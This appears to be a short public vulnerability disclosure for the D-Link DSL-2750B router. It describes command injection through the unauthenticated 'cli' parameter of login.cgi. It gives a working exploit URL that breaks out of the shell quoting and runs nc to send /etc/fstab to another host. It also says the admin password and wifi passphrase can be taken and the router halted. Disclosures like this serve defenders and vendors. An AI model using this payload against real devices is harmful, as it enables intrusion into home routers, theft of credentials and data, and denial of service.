D-Link DSL-2750B Remote Command Execution

`After some playing around I've noticed something interesting during  
login phase: by sending wrong credentials, user is redirected on an  
error page with url  
  
http://192.168.1.1:666/login.cgi?cli=access%20login%20encrypted%2041544A25DC00170BA90659AD4CBDD9D9$  
  
http://imgur.com/ZG1vU2t  
  
In order to see what's happening we must start the web server with the  
debug output enabled:  
  
httpd -o -p 666 -m -1 -v 5  
  
and try again to login with wrong credentials.  
  
http://imgur.com/tepy3XD  
  
Arguments of "cli" parameter are passed directly to a binary that will  
execute that particular given command; the complete list of commands  
available are inside "/etc/ayecli/ayecli.cli" file. (among them there's  
a creepy "system halt" that will shutdown the router no matter what).  
  
Arguments are passed in a way that  
  
ayecli -c 'command-here' so  
  
the way to escape is to close, add a command and close again to  
neutralize "$" substitution with ' :  
  
ayecli -c 'command';injection''  
that is:  
  
http://192.168.1.1/login.cgi?cli=multilingual%20show%27;nc%20192.168.1.8%20666%20%3C%2fetc%2ffstab%27$  
  
http://imgur.com/nLFnWeo  
  
it's also possible to retrieve admin password, wifi passphrase etc  
  
cheers,  
p@ql  
  
thanks to ps and fp  
  
  
`